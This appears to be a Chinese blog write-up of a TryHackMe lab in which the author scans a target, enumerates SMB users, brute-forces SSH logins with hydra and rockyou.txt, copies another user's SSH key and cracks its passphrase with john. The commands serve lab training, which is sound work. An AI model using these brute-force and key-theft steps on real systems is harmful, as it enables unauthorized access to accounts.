今天开始来打一题 Try Hack Me 的题目吧!这一题可以学习到几种常见的暴力破解相关技术。
10.10.165.235
当我们只拿到一个 IP 却不知道可以如何下手时,第一步可以尝试扫 Port,我使用了 nmap
程序来扫 Port,-A
代表 Enable OS detection, version detection, script scanning, and traceroute
nmap -A 10.10.165.235
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 04:40 EDT
Nmap scan report for 10.10.165.235
Host is up (0.27s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2021-07-24T04:41:05-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-24T08:41:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.95 seconds
python3 dirsearch.py -u http://10.10.165.235/ -e all
development
/development/
,可以找到里面有两封Email
J
跟 自称 K
的人在对话enum4linux
来暴力的透过 SMB 协定寻找使用者的帐号
enum4linux 10.10.165.235 -a
kay
跟 jan
的使用者名称kay
跟 jan
这两个使用者的名称,因此可以试着对这两组帐号进行暴力破解
hydra
-l 使用者名称
-P 字典档
rockyou.txt
hydra
与 rockyou.txt
暴力破解
hydra -l kay -P /opt/rockyou.txt ssh://10.10.165.235
hydra -l jan -P /opt/rockyou.txt ssh://10.10.165.235
jan
的密码是 armando
jan
ssh [email protected]
kay
的使用者jan
使用者後,发现可以访问 /home/kay/pass.bak
, 不过我们没有 pass.bak
的访问权限
kay
资料夹底下有 /home/kay/.ssh
资料夹
jan
的身分走 ssh 的通道传输资料
scp -r [email protected]:/home/kay/.ssh .
chmod 600 id_rsa
-i
进行登入
ssh [email protected] -i id_rsa
id_rsa
有密码 QQpython ssh2john.py id_rsa > john_ssh
john john_ssh --wordlist=/opt/rockyou.txt
beeswax
感觉这个题目不断的在做暴力破解的动作,感觉满无聊的 QQ。不过在现实生活中,暴力破解、使用弱密码真的是非常常见的事情。
<<: Day 06: Creational patterns - Factory Method
前言 昨日我们学会了Props,而Props是由外传进来的资料,进而改变组件。而组件本身的状态我们称...
接续着昨天的进度,首先可以先准备你的程序,而我在github 上有放上范例: https://git...
在最後一天的内容中,我们会以参数量、乘法数、训练过程中每一个epoch所需的时间与测试过程中每一笔资...
本篇大纲:d3.line( )、d3.bisector( )、d3.defined( )、范例图表...
我们在上一篇的Show.html 已经完成了资料查询呈现 这里要多出操作(比方像是编辑、删除...)...